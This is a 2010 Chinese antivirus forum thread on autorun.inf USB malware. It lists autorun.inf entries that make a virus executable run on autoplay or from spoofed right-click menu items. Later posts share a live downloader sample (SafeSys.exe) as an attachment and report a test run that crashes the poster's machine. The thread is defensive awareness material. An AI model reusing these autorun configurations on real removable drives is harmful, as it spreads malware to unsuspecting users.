12   1  /  2  页   跳转

关于autorun.inf病毒

收藏
本主题由 大版主 networkedition 于 2012-2-23 16:52:57 执行 移动主题 操作
完颜无泪
头像
快乐黄口狮
  • 帖子:195
  • 注册: 2010-01-02
  • 来自:
发表于: 2010-02-04 08:44 | 只看楼主 短消息 资料
字号: 1楼

关于autorun.inf病毒

前两天看到juminut兄关于U盘等移动存储设备的防毒简单措施(win xp)的帖子http://bbs.ikaka.com/showtopic-8693705.aspx 于是想到了谈谈我学些这个令人讨厌的autorun.inf病毒的一点心得和总结    要是有不对的地方还请大家指出啊

u盘病毒是利用windows系统的自动播放实现传播的
而autorun.inf就是自动播放的引导文件 所以如果要预防病毒的话首先应该禁止自动播放
而有的人为了防止autorun.inf病毒一般选用右键打开等等方式 下面是我总结的一些打开方式
1.自动播放: 
如果autorun.inf 中写入shellexecute=virous.exe 那么自动播放的话病毒运行
2&Auto:
open=virous.exe
shellexecute=virous.exe
Shell\auto\command=virous.exe
则右键会多出个auto 点击运行病毒
3.
open=virous.exe
shellexecute=virous.exe
shell\sys1=first
shell\sys1\command=virous1.exe
shell\sys2=second
shell\sys2\command=virous2.exe
这时候右键自动播放 病毒不会运行 右键菜单中会多出个first 和second 点击任何一个病毒运行
4.
shellexecute=virous.exe
shell\sys1=first
shell\sys1\command=virous1.exe
shell\sys2=second
shell\sys2\command=virous2.exe
这时候无论first,second还是自动播放病毒都运行
5.--------------注意这个啊 这个厉害
shell\open=打开--(&O)
shell\open\command=virous1.exe
shell\explore=资源管理器--(&x)
shell\explore\command=virous2.ee
shell\find=搜索--(&e)
shell\find\command=virous3.exe
右键会出现打开,资源管理器,搜索 点那个那个病毒运行 所以这就提醒大家右键打开也不保险
//所有的[AutorRun]这句都忘写了

最后是关于木马win32.autorun.acl这个就是学校机房常见的病毒之一了
感染效果就是隐藏所有文件夹  弄个exe文件 替换 主程序叫MS-DOS.com
open=MS-DOS.com
shellexecute=MS-DOS.com
shelll\open\command=MS-DOS.com
shell\explorer\command=MS-DOS.COM
当病毒运行每隔一段时间会把所有文件夹加上 +h +s 属性
同时建立一个同名病毒文件


我晕    大早上写了这么多 累死我了 累死我了 版主 能给个好评不

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
本帖被评分 2 次
分享到:
gototop
 
happysunday2003
头像
叱咤花甲狮
  • 帖子:4313
  • 注册: 2007-08-15
  • 来自:358团
论坛8周年活动礼物
发表于: 2010-02-04 08:48 | 短消息 资料
字号: 2楼

回复:关于autorun.inf病毒

不错
gototop
 
辛达星郁
头像
锋芒艾服狮
  • 帖子:1507
  • 注册: 2008-07-17
  • 来自:
就爱不长大论坛9周年纪念
发表于: 2010-02-04 09:46 | 短消息 资料
字号: 3楼

回复:关于autorun.inf病毒

很好,建议楼主在拿样本测试一下,写下测试记录,那就更完美了
要深入,要专一.......
gototop
 
Iris1011
头像
自信弱冠狮
  • 帖子:440
  • 注册: 2010-01-11
  • 来自:
发表于: 2010-02-04 09:57 | 短消息 资料
字号: 4楼

回复:关于autorun.inf病毒

本帖被评分 1 次
gototop
 
juminut
头像
拙长孩提狮
  • 帖子:80
  • 注册: 2009-07-24
  • 来自:
发表于: 2010-02-04 11:16 | 短消息 资料
字号: 5楼

回复:关于autorun.inf病毒

不错。但是经常能看到autorun.inf文件里并不是写的启动项,而是一堆乱码。我感觉里面应该直接就是病毒本身。这是我一直想不明白的。不知有人能否解释解释?谢谢。
gototop
 
夲號ヱ被ジ盜
头像
叱咤花甲狮
  • 帖子:7083
  • 注册: 2008-08-21
  • 来自:昆仑琼华派
论坛8周年活动礼物就爱不长大论坛9周年纪念冰激凌10温馨圣诞十周年国庆61周年十一周年勋章
发表于: 2010-02-04 12:10 | 短消息 资料
字号: 6楼

回复: 关于autorun.inf病毒

XP下程序的权限都太高



给你个样本测试下
样本:Safesys.exe
“死牛”或“犇牛”下载器
来自:学校本班的电教计算机
还原已被穿....
这个更猥琐

[AutoRun]
Open=SafeSys.exe
Shell\Open=打开(&O)
Shell\Open\Command=SafeSys.exe
Shell\Open\Default=1
Shell\Explore=资源管理器(&X)
Shell\Explore\Command=SafeSys.exe

附件附件:

文件名:AutoRun.rar
下载次数:312
文件类型:application/octet-stream
文件大小:
上传时间:2010-2-4 12:09:44
描述:rar
gototop
 
完颜无泪
头像
快乐黄口狮
  • 帖子:195
  • 注册: 2010-01-02
  • 来自:
发表于: 2010-02-04 12:50 | 只看楼主 短消息 资料
字号: 7楼

回复 6F 夲號ヱ被ジ盜 的帖子

带着冰点呢 听楼上一说不敢双击那个exe文件了...装次电脑不容易啊。。。
gototop
 
完颜无泪
头像
快乐黄口狮
  • 帖子:195
  • 注册: 2010-01-02
  • 来自:
发表于: 2010-02-04 12:52 | 只看楼主 短消息 资料
字号: 8楼

回复 5F juminut 的帖子

autorun乱码 是不是编码的问题啊
gototop
 
天月来了
头像
版主
  • 帖子:76903
  • 注册: 2007-02-06
  • 来自:
发表于: 2010-02-04 13:18 | 短消息 资料
字号: 9楼

回复:关于autorun.inf病毒

乱码并且体积为50多kb那个autorun.inf文件应该就是conficker病毒了
百年以后,你的墓碑旁 刻着的名字不是我
gototop
 
随缘92WJC
头像
横据古稀狮
  • 帖子:12667
  • 注册: 2009-01-13
  • 来自:
论坛8周年活动礼物祖国六十华诞论坛9周年纪念09欢乐圣诞10温馨圣诞十周年年度风云人物国庆61周年十一周年勋章
发表于: 2010-02-04 13:45 | 短消息 资料
字号: 10楼

回复: 关于autorun.inf病毒

被盗的那个样本,我虚拟机没有装系统,直接本机测试
WIN7 7100旗舰版
下载下来立马被RIS干了,就关了文件监控
下载后运行该样本,2秒后系统明显卡,几秒后倒计时蓝屏,重启
重启后WINDOWS疑难杂症窗口提示已经解决异常重启
立马扫SRENG
发现
[ocivk / ocivk][Stopped/Manual Start]
  <\??\C:\Windows\Fonts\ocivk.fon><N/A>

Autorun.inf
[E:\]
[AutoRun]
Open=SafeSys.exe
Shell\Open=打开(&O)
Shell\Open\Command=SafeSys.exe
Shell\Open\Default=1
Shell\Explore=资源管理器(&X)
Shell\Explore\Command=SafeSys.exe

双击我的电脑,盘符并没有运行SAFESYS.EXE
这是为何?

附件附件:

文件名:SREngLOG0.log
下载次数:148
文件类型:application/octet-stream
文件大小:
上传时间:2010-2-4 13:44:40
描述:log
gototop
 
<<上一主题|下一主题>>
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT